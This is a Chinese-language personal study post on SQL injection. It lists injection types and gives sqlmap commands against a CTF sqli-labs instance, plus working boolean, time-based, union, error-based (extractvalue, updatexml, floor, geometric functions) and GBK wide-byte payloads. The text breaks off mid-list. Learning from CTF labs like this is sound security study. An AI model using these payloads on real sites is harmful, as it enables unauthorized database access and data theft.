SQL注入学习（学无止境越学越不会）

上学期间的

sql注入一直都是个垃圾甚至不会写。

sql注入基础原理
首先呢了解一下什么是sql注入

sql注入就是直接将URL中的参数，http body中的post参数或者其他外来用户输入与sql语句进行拼接造成待执行的sql语句可控。最后欺骗服务器的恶意命令。

最近学习感觉SQL注入不止这么点就又来更新了：

类型：
按照注入点的类型分类的话：
（1）数字型注入：例如?id=1
（2）字符型注入：例如？name=admin
（3）搜索型注入：例如？keyword=一些你猜测的关键字

按照提交方式的话：
（1）get注入：注入点在get参数部分例如?id=1,注入点就是id
（2）post注入：在表单中注入点在post位置
（3）cookie注入：cookie值
（4）http头部注入：头部字段中

执行效果：
（1）布尔盲注：即可以根据返回页面判断条件真假的注入
（2）时间盲注：即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。
（3）报错注入：即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。

单引号
双引号
基于数字型注入

（4）联合查询注入：可以使用union的情况下的注入。
（5）堆查询注入：可以同时执行多条语句的执行时的注入。
（6）宽字节注入：单字节、多字节、利用gbk

下面用sqlmap跑出答案根据sqlilab：（不会有人觉得自己比sqlmap厉害吧）
首先呢来个简单的最简单的操作
可以看到?id=1显示正常 ?id=1’显示不正常所以存在注入点


直接上手sqlmap跑库名

sqlmap -u http://1fdaef43-dde6-4499-84f2-1afd3e9bb1b4.node3.buuoj.cn/Less-1/?id=1 --dbs 

知道库我们就可以跑表名

sqlmap -u http://1fdaef43-dde6-4499-84f2-1afd3e9bb1b4.node3.buuoj.cn/Less-1/?id=1 -D'ctftraining' -tables v3 

接着跑列名

sqlmap -u http://1fdaef43-dde6-4499-84f2-1afd3e9bb1b4.node3.buuoj.cn/Less-1/?id=1 -D'ctftraining' -T'tables' -columns v3

现在我们只需要查询这个flag的内容就可以了

sqlmap -u http://1fdaef43-dde6-4499-84f2-1afd3e9bb1b4.node3.buuoj.cn/Less-1/?id=1 -D'ctftraining' -T'flag' -C'flag' -dump v3

-D 就是database数据库
-T 就是tables表名
-C 就是columns列名
dump就是跑出内容

布尔注入

布尔型

?id=1'and (length(database()))>10 --+

当database的长度大于10的时候返回值位true，反之为false

报错型
构造payload让信息通过错误提示回显出来，一种类型是先报字段数，再利用后台数据库报错机制回显（跟一般的报错区别是，一般的报错注入是爆出字段数后，在此基础通过正确的查询语句，使结果回显到页面；后者是在爆出字段数的基础上使用能触发SQL报错机制的注入语句）

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;

count计数 concat连接字符 floor重复数据 group by 进行分组rand(0)避免数据重复造成的错误。

时间型：
通过sleep函数还有if sleep联合逐个猜

?id=1' and (if(ascii(substr(database(),1,1))>100,sleep(10),sleep(4))  --+ 

第一个ascii码大于100，true沉睡10s false沉睡4s。

时间盲注

和上面的一样使用sleep和if sleep联合一起猜，
通过回显的时间进行判断。

报错注入

在无法使用联合查询的时候用，前提不能被过滤掉一些关键函数。
利用数据库的某些机制人为制造错误。
（1）xpath语法错误：
利用extractvalue和updatexml函数

函数原型：extractvalue(xml_document,Xpath_string)
正常语法：extractvalue(xml_document,Xpath_string);
第一个参数：xml_document是string格式，为xml文档对象的名称 第二个参数：Xpath_string是xpath格式的字符串
作用：从目标xml中返回包含所查询值的字符串

payload     -- --    id='and(select extractvalue("anything",concat('~',(select语句))))

查数据库名：id='and(select extractvalue(1,concat(0x7e,(select database()))))
爆表名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
爆字段名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
爆数据：id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

联合查询注入

首先要求网站需要有一个正常的回显位置，简单来说就是注入后数据库会在页面出现一个正常的回显。

如何判断是否存在：
1.判断是否存在注入点
2.判断是整型还是字符型
3.判断查询列数
4.判断显示位
5.获取所有数据库名
6.获取数据库所有表名
7.获取字段名
8.获取字段中的数据

之后就是加入一些联合查询的语句
例如：?id=-1' union select 1,2,( select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)
剩下的都是一些正常注入语句

宽字节注入

首先就是
1、单字节字符集：所有的字符都使用一个字节来表示，比如 ASCII 编码(0-127)。

2、多字节字符集：在多字节字符集中，一部分字节用多个字节来表示，另一部分（可能没有）用单个字节来表示。

3、宽字节注入时利用mysql的一个特性，使用GBK编码的时候，会认为两个字符是一个汉字。

利用反斜杠的GBK编码为%5C,只要转换这些就可以了
例如查询数据库版本，将反斜杠通过GBK编码就可以，其他的一样编码

192.168.0.104/aiyou/1.php?id=-2%E0' union select 1,database(),version(),4 --+

那么如何发现呢首先就是

MySQL的在使用GBK编码的时候，会认为两个字符是一个汉字
前一个ASCII码要大于128，才到汉字的范围）

在注入点输入(‘)会被转义为(’)编码后变成（%5c%27），所以只有吧\去掉才能注入
然而GBK编码表，就会把\吃掉。

简单使用and、or、’，判断是否有注入，不行接着加入一些自己创的语句简单判断
如果没有看到效果，可进行宽字节注入探测，输入%bf’（或者%81’），发现报错，存在宽字节注入
都不行那就试试https头部注入

这玩意咋越看越不会，就先这样，写别的去了

mysql注入

最近上班看了继续看注入了
sql注入大致分为有回显的和无回显的。

判断是否存在sql注入

判断是否注入就是看是否出现异常

比如加单引号、双引号、括号或者都混合起来
又或者当没有返回报错信息的时候，用上前面的那种?id=1 and 1=1 还有and1=2这是数字型的，如果遇到字符型的话需要我们闭合语句，使用#|--+|'等闭合
但是当网页啥都没有返回的时候，需要我们加入例如sleep()这类能够产生延迟的函数，对比服务器响应的时间来判断。
sql常用语句

有回显的

SELECT 列名称 FROM 表名称 WHERE 列 运算符 值

获取列的数量

?id=1' order by number--+
?id=1' union select 1,2,3,4--+

就是如果超过了就会报错，他只会显示有的
首先information_schema.schemata

information_schema.schemata介绍
+1

依靠慢慢从上到下查库出来

报错注入

上面哪里就只有一些
就是当你注入最后他还是会给你爆出错误例如mysql_error()等，并不会和无回显的一样啥都没
报错常用的

1.floor() 
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue() 
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));6.polygon() 
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));7.multipolygon() 
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));8.linestring() 
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));9.multilinestring() 
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));10.exp() 
select * from test where id=1 and exp(~(select * from(select user())a));

无回显的

需要判断

回显内容、长度不同
返回的HTTP头的不同，比如结果为真可能会返回Location头或者set-cookie
看HTTP状态码，比如结果为真（登录成功）则3xx重定向，为假则返回200
服务器响应时间

盲注

判断表达式的真假（or and ^等逻辑运算符）
字符串截取（substr()、left()、REGEXP）
判断字符串是否相等（= > LIKE REGEXP等比较运算符）

例如布尔盲注